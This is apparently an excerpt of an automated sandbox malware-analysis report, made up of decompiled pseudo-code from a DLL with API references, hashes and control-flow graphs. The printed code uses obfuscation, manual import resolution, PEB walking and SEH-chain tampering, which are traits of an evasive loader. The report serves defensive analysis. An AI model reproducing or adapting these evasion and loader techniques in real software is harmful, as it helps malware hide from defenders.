            					 *( *((intOrPtr*)(_t327 + 0x50)) + 0x90) =  *( *((intOrPtr*)(_t327 + 0x50)) + 0x90) |  *((intOrPtr*)(_t327 + 0x124)) + 0x00002ab3;
            					return 0;
            				}
            				_t268 =  *(_t327 + 0x1c);
            				if(_t268 == 0x260c) {
            					L5:
            					_t313 =  *((intOrPtr*)(_t327 + 0x88));
            					_t299 = 0x24ad;
            					if( *((intOrPtr*)(_t313 + 0x80)) - 0x9f6 <= 0x24ad) {
            						L8:
            						 *(_t327 + 0x48) =  *(_t327 + 0x48) |  *(_t327 + 0xc4) + 0x000024ad;
            						_t331 =  *((intOrPtr*)( *( *((intOrPtr*)(_t327 + 0x1d4)) + 0x1c) * 0x75bcc628 +  *((intOrPtr*)(_t327 + 0x70)) + 0x78)) +  *((intOrPtr*)(_t327 + 0x40));
            						while(1) {
            							_t270 =  *((intOrPtr*)(_t331 + 0xc));
            							 *((intOrPtr*)(_t335 + 0x14)) = _t331;
            							if(_t270 == 0) {
            								break;
            							}
            							_t181 = LoadLibraryA( *((intOrPtr*)(_t327 + 0x40)) + _t270); // executed
            							_t314 = _t181;
            							 *(_t335 + 0x20) = _t314;
            							if(_t314 == 0) {
            								L57:
            								_t331 = _t331 + 0x14;
            								 *(_t327 + 0x90) =  *((intOrPtr*)(_t327 + 0xbc)) - 0x29d1;
            								continue;
            							}
            							_t258 =  *((intOrPtr*)(_t331 + 0x10)) +  *((intOrPtr*)(_t327 + 0x40));
            							 *(_t335 + 0x10) = _t258;
            							 *((intOrPtr*)(_t327 + 0x100)) =  *((intOrPtr*)(_t327 + 0x100)) + ( *( *((intOrPtr*)(_t327 + 0x1d4)) + 0x1a8) | 0x000028a4);
            							_t274 =  *((intOrPtr*)(_t327 + 0x4c));
            							if(_t274 == 0x260c) {
            								L14:
            								_t300 =  *(_t335 + 0x28);
            								 *(_t327 + 0x90) =  *(_t327 + 0x90) - ( *(_t327 + 0x5c) | _t300);
            								if(( *( *_t327 + 0x80) ^ 0x00000f4c) >  *((intOrPtr*)(_t327 + 0xbc))) {
            									 *( *((intOrPtr*)(_t327 + 8)) + 0xc4) =  *( *((intOrPtr*)(_t327 + 8)) + 0xc4) ^  *((intOrPtr*)(_t327 + 0x80)) - _t300;
            								}
            								_t275 =  *((intOrPtr*)(_t327 + 0x1d4));
            								if( *_t331 != ( *(_t275 + 0x1c) ^ 0x0000260d)) {
            									if( *((intOrPtr*)(_t327 + 0xd0)) != ( *(_t275 + 0x4c) ^ 0x000038e3)) {
            										 *((intOrPtr*)(_t327 + 0x1a0)) =  *(_t327 + 0x48) - 0x2ab3;
            									}
            									_t316 =  *_t327;
            									_t301 = 0x2749;
            									if( *(_t316 + 0x1c) * 0x2aa0932d <= 0x2749) {
            										L23:
            										_t302 = 0x2749;
            										_t317 =  *((intOrPtr*)(_t327 + 0x74));
            										 *((intOrPtr*)(_t327 + 0xd0)) =  *((intOrPtr*)(_t327 + 0xbc)) - 0x252e;
            										_t333 =  *_t331 +  *((intOrPtr*)(_t327 + 0x40));
            										if( *((intOrPtr*)(_t317 + 0x2c)) == 0x2871) {
            											L26:
            											_t258 =  *(_t335 + 0x10);
            											_t318 =  *(_t335 + 0x20);
            											if( *((intOrPtr*)( *((intOrPtr*)(_t327 + 0x10)) + 0x1c)) + 0x3a5 >= 0x2ea5) {
            												 *((intOrPtr*)(_t327 + 0xf8)) = 0x4dbae75;
            											}
            											goto L28;
            										}
            										_t293 =  *(_t327 + 0x190);
            										_t264 = _t327 + 0x158;
            										do {
            											_t293 = _t293 ^ _t264;
            											_t302 = _t302 + 1;
            											 *(_t327 + 0x190) = _t293;
            										} while (_t302 !=  *((intOrPtr*)(_t317 + 0x2c)) - 0x128);
            										goto L26;
            									} else {
            										_t294 =  *(_t327 + 0x28);
            										_t265 = _t327 + 0x1a8;
            										do {
            											_t294 = _t294 ^ _t265;
            											_t301 = _t301 + 1;
            											 *(_t327 + 0x28) = _t294;
            										} while (_t301 <  *(_t316 + 0x1c) * 0x2aa0932d);
            										goto L23;
            									}
            								} else {
            									_t333 = _t258;
            									L28:
            									_t276 =  *_t333;
            									if(_t276 == 0) {
            										L55:
            										_t331 =  *((intOrPtr*)(_t335 + 0x14));
            										if( *(_t327 + 0x1c) > 0x2b78) {
            											 *((intOrPtr*)( *((intOrPtr*)(_t327 + 0x50)) + 0x1a0)) =  *(_t335 + 0x28) + 0x1eee;
            										}
            										goto L57;
            									}
            									_t259 = _t258 - _t333;
            									 *(_t335 + 0x18) =  *(_t335 + 0x24) | 0x00001e7b;
            									 *(_t335 + 0x10) = _t259;
            									do {
            										if((_t276 &  *(_t327 + 0x1c) << 0x0000001f) == 0) {
            											_t320 =  *((intOrPtr*)(_t327 + 0x40)) + _t276;
            											_t207 =  *((intOrPtr*)( *((intOrPtr*)(_t327 + 8)) + 0x1c)) - 0x424;
            											if(_t207 > 0x21e9) {
            												L47:
            												if(( *( *((intOrPtr*)(_t327 + 0x1d4)) + 0x1c) ^ 0x00003bfe) <=  *((intOrPtr*)(_t327 + 0xd8))) {
            													 *((intOrPtr*)( *_t327 + 0x48)) =  *((intOrPtr*)( *_t327 + 0x48)) - ( *(_t335 + 0x24) | 0x00002ea5);
            												}
            												_t318 =  *(_t335 + 0x20);
            												 *((intOrPtr*)(_t259 + _t333)) = GetProcAddress(_t318, _t320 + 2);
            												 *(_t327 + 0x24) =  *(_t327 + 0x104) * 0x1e7b;
            												_t280 =  *( *((intOrPtr*)(_t327 + 0x74)) + 0x4c) ^ 0x000007e4;
            												if(_t280 <= 0x21ea) {
            													_t308 =  *(_t327 + 0x130);
            													_t326 =  *((intOrPtr*)(_t327 + 0x168)) + 0xffffd62f;
            													_t217 = 0x21eb - _t280;
            													do {
            														_t308 = _t308 ^ _t326;
            														_t217 = _t217 - 1;
            													} while (_t217 != 0);
            													 *(_t327 + 0x130) = _t308;
            													L53:
            													_t318 =  *(_t335 + 0x20);
            												}
            												goto L54;
            											}
            											_t309 =  *(_t327 + 0x24);
            											_t284 = 0x21ea - _t207;
            											do {
            												_t309 = _t309 * 0x2ab4;
            												_t284 = _t284 - 1;
            											} while (_t284 != 0);
            											 *(_t327 + 0x24) = _t309;
            											goto L47;
            										}
            										_t305 = 0x2c90;
            										if( *( *((intOrPtr*)(_t327 + 0x74)) + 0x2c) * 0x5eafc6a6 <= 0x2c90) {
            											L33:
            											_t286 =  *((intOrPtr*)(_t327 + 8));
            											 *(_t327 + 0x48) =  *(_t327 + 0x48) |  *(_t286 + 0xd4) *  *(_t335 + 0x28);
            											_t261 =  *((intOrPtr*)(_t318 + 0x3c)) + _t318;
            											 *((intOrPtr*)(_t286 + 0x30)) =  *((intOrPtr*)(_t286 + 0x30)) +  *(_t327 + 0x190) * 0x1eee;
            											_t321 =  *(_t327 + 0x1c);
            											_t288 =  *((intOrPtr*)( *((intOrPtr*)(_t327 + 0x50)) + 0x80)) - 0x9f8;
            											_t226 = _t321 - 0x160;
            											if(_t288 == _t226) {
            												L37:
            												_t262 =  *(_t335 + 0x20);
            												_t229 =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x78)) + _t262 + 0x1c)) + (( *_t333 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x78)) + _t262 + 0x10))) * 4;
            												if( *((intOrPtr*)(_t327 + 0x110)) != 0x1e7b) {
            													 *(_t327 + 0x130) = _t321 | 0x00002c90;
            												}
            												_t230 =  *(_t327 + 0x48);
            												_t307 =  *((intOrPtr*)(_t229 + _t262)) + _t262;
            												_t263 =  *((intOrPtr*)(_t327 + 0x74));
            												_t291 = 0x2ab3;
            												 *(_t327 + 0x28) = _t230;
            												 *(_t327 + 0x48) = _t230 + 1;
            												if( *(_t263 + 0x1c) * 0x86df5549 <= 0x2ab3) {
            													L42:
            													_t259 =  *(_t335 + 0x10);
            													 *((intOrPtr*)(_t259 + _t333)) = _t307;
            													goto L53;
            												} else {
            													_t323 =  *((intOrPtr*)(_t327 + 0x1d4));
            													do {
            														_t291 = _t291 + 1;
            														 *(_t327 + 0x24) =  *(_t323 + 0x24) | 0x000029b2;
            													} while (_t291 <  *(_t263 + 0x1c) * 0x86df5549);
            													goto L42;
            												}
            											}
            											_t311 =  *((intOrPtr*)(_t327 + 0x80)) -  *(_t335 + 0x28);
            											_t236 = _t226 - _t288;
            											do {
            												_t236 = _t236 - 1;
            											} while (_t236 != 0);
            											 *(_t327 + 0x30) = _t311;
            											goto L37;
            										} else {
            											goto L32;
            										}
            										do {
            											L32:
            											 *( *((intOrPtr*)(_t327 + 0x10)) + 0x90) =  *( *((intOrPtr*)(_t327 + 0x10)) + 0x90) ^  *(_t327 + 0x158) - 0x00002597;
            											_t305 = _t305 + 1;
            										} while (_t305 <  *( *((intOrPtr*)(_t327 + 0x74)) + 0x2c) * 0x5eafc6a6);
            										goto L33;
            										L54:
            										_t333 =  &(_t333[2]);
            										 *((intOrPtr*)( *((intOrPtr*)(_t327 + 0x88)) + 0xc4)) =  *((intOrPtr*)( *((intOrPtr*)(_t327 + 0x88)) + 0xc4)) +  *(_t335 + 0x18);
            										_t276 =  *_t333;
            									} while (_t276 != 0);
            									goto L55;
            								}
            							}
            							_t248 =  *(_t327 + 0x30);
            							_t304 =  *(_t327 + 0x28) + 0xffffde17;
            							_t296 = _t274 + 0xffffd9f4;
            							do {
            								_t248 = _t248 | _t304;
            								_t296 = _t296 - 1;
            							} while (_t296 != 0);
            							 *(_t327 + 0x30) = _t248;
            							goto L14;
            						}
            						 *(_t327 + 0x90) =  *(_t327 + 0x90) | _t327 + 0x00000114;
            						goto L60;
            					}
            					_t297 =  *(_t327 + 0x48);
            					do {
            						_t297 = _t297 +  *(_t327 + 0x28) -  *(_t335 + 0x24);
            						_t299 = _t299 + 1;
            						 *(_t327 + 0x48) = _t297;
            					} while (_t299 <  *((intOrPtr*)(_t313 + 0x80)) - 0x9f6);
            					goto L8;
            				} else {
            					_t253 =  *(_t327 + 0xc4);
            					_t298 = _t268 + 0xffffd9f4;
            					do {
            						_t253 = _t253 ^ 0x00002dbf;
            						_t298 = _t298 - 1;
            					} while (_t298 != 0);
            					 *(_t327 + 0xc4) = _t253;
            					goto L5;
            				}
            			}

            APIs
            • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?), ref: 6D505AE8
            • GetProcAddress.KERNEL32(?,?), ref: 6D505DD9
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID:
            • API String ID: 2574300362-0
            • Opcode ID: 2e195d9e2f59183d4d548d5c05f167967addbee4d06f428e3343c9ebd5cc489a
            • Instruction ID: fb470fca57dd8ff979601d5b73603b900a060ec3a1902aef3828cc961d297b62
            • Opcode Fuzzy Hash: 2e195d9e2f59183d4d548d5c05f167967addbee4d06f428e3343c9ebd5cc489a
            • Instruction Fuzzy Hash: B7E10471600B018FD728CF29C594AA6B7F1FF88304F158A6EE99A8BB95D730F945CB41
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 126 6d50e224-6d50e229 127 6d50e22b-6d50e243 126->127 128 6d50e251-6d50e25a 127->128 129 6d50e245-6d50e249 127->129 131 6d50e26c 128->131 132 6d50e25c-6d50e25f 128->132 129->128 130 6d50e24b-6d50e24f 129->130 133 6d50e2cc-6d50e2d0 130->133 136 6d50e26e-6d50e27b GetStdHandle 131->136 134 6d50e261-6d50e266 132->134 135 6d50e268-6d50e26a 132->135 133->127 137 6d50e2d6-6d50e2d9 133->137 134->136 135->136 138 6d50e28a 136->138 139 6d50e27d-6d50e27f 136->139 141 6d50e28c-6d50e28e 138->141 139->138 140 6d50e281-6d50e288 GetFileType 139->140 140->141 142 6d50e290-6d50e29b 141->142 143 6d50e2ae-6d50e2c0 141->143 145 6d50e2a3-6d50e2a6 142->145 146 6d50e29d-6d50e2a1 142->146 143->133 144 6d50e2c2-6d50e2c5 143->144 144->133 145->133 147 6d50e2a8-6d50e2ac 145->147 146->133 147->133
            C-Code - Quality: 84%
            			E6D50E224() {
            				signed int _t20;
            				signed int _t22;
            				long _t23;
            				signed int _t25;
            				void* _t28;
            				signed int _t31;
            				void* _t33;
            
            				_t31 = 0;
            				do {
            					_t20 = _t31 & 0x0000003f;
            					_t33 = _t20 * 0x30 +  *((intOrPtr*)(0x6d55dda0 + (_t31 >> 6) * 4));
            					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
            						 *(_t33 + 0x28) = 0x81;
            						_t22 = _t31;
            						if(_t22 == 0) {
            							_push(0xfffffff6);
            						} else {
            							if(_t22 == 1) {
            								_push(0xfffffff5);
            							} else {
            								_push(0xfffffff4);
            							}
            						}
            						_pop(_t23);
            						_t28 = GetStdHandle(_t23);
            						if(_t28 == 0xffffffff || _t28 == 0) {
            							_t25 = 0;
            						} else {
            							_t25 = GetFileType(_t28); // executed
            						}
            						if(_t25 == 0) {
            							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
            							 *(_t33 + 0x18) = 0xfffffffe;
            							_t20 =  *0x6d55dfd0; // 0xb09328
            							if(_t20 != 0) {
            								_t20 =  *(_t20 + _t31 * 4);
            								 *(_t20 + 0x10) = 0xfffffffe;
            							}
            						} else {
            							_t20 = _t25 & 0x000000ff;
            							 *(_t33 + 0x18) = _t28;
            							if(_t20 != 2) {
            								if(_t20 == 3) {
            									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
            								}
            							} else {
            								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
            							}
            						}
            					} else {
            						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
            					}
            					_t31 = _t31 + 1;
            				} while (_t31 != 3);
            				return _t20;
            			}











            APIs
            • GetStdHandle.KERNEL32(000000F6), ref: 6D50E270
            • GetFileType.KERNELBASE(00000000), ref: 6D50E282
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: FileHandleType
            • String ID:
            • API String ID: 3000768030-0
            • Opcode ID: dd51fb676e27791472f6dce8a8f9a0efc06d4fdbd07d9f3feac53dbf31987345
            • Instruction ID: 1e0e458e67e088439fbce021ffa6dc79686668c44c3b7f18397567532d2a09cf
            • Opcode Fuzzy Hash: dd51fb676e27791472f6dce8a8f9a0efc06d4fdbd07d9f3feac53dbf31987345
            • Instruction Fuzzy Hash: F811D632108B4386DB399A3ECC89322BAA5AB97330B350F1AD4B6D7DE1C730D486C600
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 148 6d506b43-6d506b61 149 6d506b63-6d506b6e GetProcessHeap 148->149 150 6d506bb6-6d506bb9 148->150 151 6d506b70-6d506b74 RtlFreeHeap 149->151 152 6d506b7a-6d506ba0 149->152 151->152 152->150 153 6d506ba2 152->153 154 6d506ba4-6d506bb4 153->154 154->150 154->154
            C-Code - Quality: 100%
            			E6D506B43(intOrPtr _a4, signed int _a8) {
            				signed int _t18;
            				void* _t19;
            				signed int _t25;
            				void* _t27;
            				void* _t28;
            				intOrPtr _t29;
            
            				_t25 = _a8;
            				_t29 = _a4;
            				_t28 =  *(_t29 + 0x8c);
            				_t18 =  *(_t29 + 0x148) | _t25;
            				 *((intOrPtr*)(_t29 + 0x3c)) =  *((intOrPtr*)(_t29 + 0x3c)) - _t18;
            				if(_t28 != 0) {
            					_t19 = GetProcessHeap();
            					 *((intOrPtr*)(_t29 + 0x30)) =  *((intOrPtr*)(_t29 + 0x30)) + _t25;
            					if(_t19 != 0) {
            						RtlFreeHeap(_t19, 0, _t28); // executed
            					}
            					 *(_t29 + 0xc4) =  *(_t29 + 0xc4) |  *((intOrPtr*)(_t29 + 0x88)) + 0x00000118;
            					_t18 =  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x1d4)) + 0x4c)) + 0x898;
            					if(_t18 != 0x2ea7) {
            						_t27 = 0x2ea7 - _t18;
            						do {
            							_t18 =  *(_t29 + 0x124);
            							 *(_t18 + 0x24) =  *(_t18 + 0x24) | 0x0000081a;
            							_t27 = _t27 - 1;
            						} while (_t27 != 0);
            					}
            				}
            				return _t18;
            			}










            APIs
            • GetProcessHeap.KERNEL32(00000532,?,-00000484,6D5155FB,?,00002B78,?,6D51A458,?,?,6D515142,?,?,?,?,?), ref: 6D506B63
            • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 6D506B74
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: Heap$FreeProcess
            • String ID:
            • API String ID: 3859560861-0
            • Opcode ID: dba6e01c95109f24d5005f6a89051358fc16824115a5b0717516e5b75578e8a5
            • Instruction ID: e5868095f0a70c8b1806ffdf6a1a42caca46f69d162f13d52939ecf28a8c213b
            • Opcode Fuzzy Hash: dba6e01c95109f24d5005f6a89051358fc16824115a5b0717516e5b75578e8a5
            • Instruction Fuzzy Hash: C40131766017029FEB68DB79CA85B96B7F4FF55321F01882DE5AAC3A40DB70F8408B51
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 155 6d50b523-6d50b52e 156 6d50b530-6d50b53a 155->156 157 6d50b53c-6d50b542 155->157 156->157 158 6d50b570-6d50b57b call 6d50bf62 156->158 159 6d50b544-6d50b545 157->159 160 6d50b55b-6d50b56c RtlAllocateHeap 157->160 164 6d50b57d-6d50b57f 158->164 159->160 161 6d50b547-6d50b54e call 6d50e89b 160->161 162 6d50b56e 160->162 161->158 168 6d50b550-6d50b559 call 6d50e440 161->168 162->164 168->158 168->160
            C-Code - Quality: 95%
            			E6D50B523(void* __ecx, signed int _a4, signed int _a8) {
            				void* __esi;
            				void* _t8;
            				void* _t12;
            				signed int _t13;
            				void* _t15;
            				signed int _t16;
            				signed int _t18;
            				long _t19;
            
            				_t15 = __ecx;
            				_t18 = _a4;
            				if(_t18 == 0) {
            					L2:
            					_t19 = _t18 * _a8;
            					if(_t19 == 0) {
            						_t19 = _t19 + 1;
            					}
            					while(1) {
            						_t8 = RtlAllocateHeap( *0x6d55dd9c, 8, _t19); // executed
            						if(_t8 != 0) {
            							break;
            						}
            						__eflags = E6D50E89B();
            						if(__eflags == 0) {
            							L8:
            							 *((intOrPtr*)(E6D50BF62())) = 0xc;
            							__eflags = 0;
            							return 0;
            						}
            						_t12 = E6D50E440(_t15, _t16, _t19, __eflags, _t19);
            						_pop(_t15);
            						__eflags = _t12;
            						if(_t12 == 0) {
            							goto L8;
            						}
            					}
            					return _t8;
            				}
            				_t13 = 0xffffffe0;
            				_t16 = _t13 % _t18;
            				if(_t13 / _t18 < _a8) {
            					goto L8;
            				}
            				goto L2;
            			}












            APIs
            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,6D50C909,00000001,00000364,?,6D50B06B,00000001,00000001), ref: 6D50B564
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 416a99699eed813a63527157329eed2eabf9a2cda9a6c289b6abbac09fcd6f18
            • Instruction ID: a8d537adba703a09d85395ba6be132989cfe8e3d70b269524275c5e12efb1edd
            • Opcode Fuzzy Hash: 416a99699eed813a63527157329eed2eabf9a2cda9a6c289b6abbac09fcd6f18
            • Instruction Fuzzy Hash: F1F02B3174412596DB197A25688471A3B58AF91760F168491ED14D6DC0FB20DD0045A1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E6D50391B() {
            				intOrPtr _t375;
            				signed int _t376;
            				signed int _t413;
            				signed int _t480;
            				signed int _t491;
            				int _t503;
            				void* _t532;
            				signed int _t537;
            				signed int* _t557;
            				signed int _t585;
            				signed int _t590;
            				signed int* _t591;
            				signed int* _t592;
            				intOrPtr _t596;
            				signed int _t597;
            				intOrPtr _t599;
            				signed int _t600;
            				signed int _t607;
            				void* _t608;
            				signed int _t609;
            				signed int _t617;
            				signed int _t618;
            				signed int _t633;
            				signed int _t634;
            				signed int _t635;
            				signed int _t639;
            				signed int _t643;
            				signed int _t645;
            				signed int _t653;
            				void* _t655;
            				signed int _t662;
            				signed int _t663;
            				signed int _t665;
            				signed int _t666;
            				signed int _t669;
            				signed int _t670;
            				signed int _t673;
            				signed int _t678;
            				signed int _t680;
            				signed int _t682;
            				signed int _t685;
            				signed int _t686;
            				signed int _t687;
            				signed int _t690;
            				signed int _t692;
            				signed int _t693;
            				signed int _t697;
            				void* _t698;
            				signed int _t702;
            				signed int _t704;
            				void* _t712;
            
            				_t597 =  *(_t712 + 0x4c);
            				 *((intOrPtr*)(_t712 + 4)) =  *((intOrPtr*)(_t712 + 0x3c)) + 0x7e8;
            				_t375 =  *((intOrPtr*)(_t712 + 0x34));
            				_t704 = _t375 - 0x2b78;
            				 *(_t712 + 0x1c) = 0x2ea5;
            				_t590 = _t375 + 0x118;
            				 *(_t712 + 0x20) = _t704;
            				_t376 =  *(_t712 + 0x50);
            				_t682 = _t597 + 0xb37;
            				 *(_t712 + 0x5c) = _t682;
            				 *(_t712 + 0x14) = _t597 + 0x792;
            				_t662 = _t704;
            				 *(_t712 + 0x4c) = _t590;
            				_t599 = _t376 + 0xa7f;
            				 *(_t712 + 0x40) = _t662;
            				_t692 = _t376 + 0xcc0;
            				 *((intOrPtr*)(_t712 + 0x18)) = _t599;
            				 *(_t712 + 0x50) = _t692;
            				if(_t599 <= _t704 + 0x24ad) {
            					_t591 =  *(_t712 + 0x60);
            					L8:
            					_t663 =  *(_t712 + 0x4c);
            					L9:
            					if(_t682 ==  *(_t712 + 0x10) + 0xfffffc3c) {
            						L58:
            						if(_t682 <  *(_t712 + 0x10) + 0xfffffbc6) {
            							_t693 =  *(_t712 + 0x14);
            							if(_t591[0xa] != _t591[0x49] * _t693) {
            								_t591[0x36] = _t591[0x36] + ((_t591[0x4f] | 0x00002ac3) ^ _t693);
            							}
            							_t600 = _t591[0x22];
            							_t591[0x75] = _t591[0x75] + _t591[0x5a] -  *(_t712 + 0x40) + _t663;
            							_push(_t600 ^  *(_t712 + 0x50) ^  *(_t712 + 0x10));
            							_push(_t591);
            							_t591[0x64] = _t591[0x64] - ( *(_t712 + 0x50) ^ 0x00001e7b) * _t600;
            							_push(_t591[0x17] * _t591[0xf] * 0x24ad);
            							_push(0);
            							_push(_t591[0x1d] * 0x29b2);
            							_push(_t693 ^ _t704);
            							_push((_t591[0x75] - 0x1e7b) * _t591[0x35]);
            							_push((_t591[0x34] ^ 0x00002ac3) - _t591[0x4c]);
            							_push( ~(_t591[0x3f]));
            							_push( *(_t712 + 0x64) & 0x00002ea5);
            							E6D50226B();
            							_t712 = _t712 + 0x28;
            							_t591[0x60] = _t591[0x60] ^ _t704 & 0x000028a4;
            						} else {
            							_t591[0x23] = _t591[8];
            							if(_t591[0x56] <= _t591[0x5a]) {
            								_t591[0x12] = (_t591[0x4c] | 0x000021e9) * _t591[0x12];
            							}
            							E6D506B43(_t591, 0x2c90);
            							_t591[0x59] = _t591[0x58];
            							if(_t591[0x4f] > 0x29b2) {
            								_t591[0x24] = _t591[0x24] ^ 0x00003efe;
            							}
            							_t413 = _t591[0x68];
            							_t591[0x4f] = _t413;
            							_t591[0x68] = _t413 + 1;
            						}
            						return  *(_t712 + 0x40) + 0x24ad;
            					}
            					_t591[0x62] = GetProcAddress(_t591[0x4a],  &(_t591[0x25]));
            					_t591[0x5c] =  *((intOrPtr*)(_t591[0x1c] + 0x78 + ( *(_t591[0x1d] + 0x80) ^ 0x00002eac) * 8)) + _t591[0x10];
            					 *((intOrPtr*)(_t591[0x14] + 0x158)) =  *((intOrPtr*)(_t591[0x14] + 0x158)) + 0x37c9;
            					_t607 = _t591[0x5c];
            					if(_t607 == _t591[0x10]) {
            						L35:
            						_t665 = _t591[4];
            						_t608 = 0x1e7b;
            						if( *(_t665 + 0x2c) * 0xf17697d9 < 0x1e7b) {
            							L38:
            							if( *((intOrPtr*)(_t591[0x22] + 0x1c)) - 0xdf < 0x260d) {
            								_t591[0x34] = _t591[0x34] + 0x602f9ca;
            							}
            							_t591[0x63] =  *[fs:0x30];
            							_t591[0x64] = _t591[0x64] + 0x4a8d;
            							_t591[0xa] = _t591[0xa] ^  *(_t591[0x1d] + 0x30) * 0x00001eee;
            							_t666 = _t591[0x63];
            							_t609 =  *( *((intOrPtr*)(_t666 + 0xc)) + 0x14);
            							_t591[0x66] = _t609;
            							if(_t609 ==  *((intOrPtr*)(_t666 + 0xc)) + 0x14) {
            								L51:
            								_t591[0x39] = _t591[0x39] | _t591[0x4c] | 0x0000252e;
            								_t591[0x78] =  *[fs:0x0];
            								 *((intOrPtr*)(_t591[4] + 0xd4)) = 0x721e459;
            								 *(_t591[0x49] + 0xd4) =  *(_t591[0x49] + 0xd4) ^  *(_t591[2]) * 0x00002872;
            								_t663 =  *(_t712 + 0x4c) - 0xda2;
            								while( *((intOrPtr*)(_t591[0x78] + 4)) >= _t591[0x65]) {
            									if( *((intOrPtr*)(_t591[0x78] + 4)) >= _t591[0x77] + _t591[0x65]) {
            										break;
            									}
            									if( *((intOrPtr*)(_t591[2] + 0x4c)) != 0x2088) {
            										_t591[0x12] = _t591[0x12] + _t591[0x14] + 0x48;
            									}
            									_t591[9] = _t591[9] + 0xffffd370 - _t591[0x3f];
            									_t591[0x78] =  *(_t591[0x78]);
            									_t591[0x34] = _t591[0x40] + 0x2ab3;
            									_t591[0x60] = _t591[0x60] ^  *_t591 - 0x00002597;
            								}
            								 *[fs:0x0] = _t591[0x78];
            								_t591[0x4f] = 0xfffffd78;
            								 *((intOrPtr*)(_t591[0x22] + 0x30)) =  *((intOrPtr*)(_t591[0x1d] + 0x28)) - 0x2ea5;
            								_t591[0x58] =  *((intOrPtr*)(_t591[0x11] + 0x28)) + _t591[0x10];
            								_t591[0x4f] =  &(_t591[9]) + _t591[0x4f];
            								_t591[9] = 0x7eb9458;
            								_t591[0x36] = _t591[0x36] ^ _t591[2] + 0x000024ad;
            								goto L58;
            							} else {
            								L42:
            								L42:
            								if( *((intOrPtr*)(_t591[0x22] + 0x80)) - 0x102a < ( *( *_t591 + 0x80) ^ 0x00000b32)) {
            									_t491 = _t591[0x3e];
            									_t591[0x24] = _t591[0x24] | _t491;
            									_t591[0x3e] = _t491 + 1;
            								}
            								_t591[0x66] = _t591[0x66] + 0xfffffff8;
            								_t591[0x4f] = _t591[0x4f] |  *((intOrPtr*)(_t591[2] + 0x180)) + 0x0000252e;
            								_t617 = _t591[0x66];
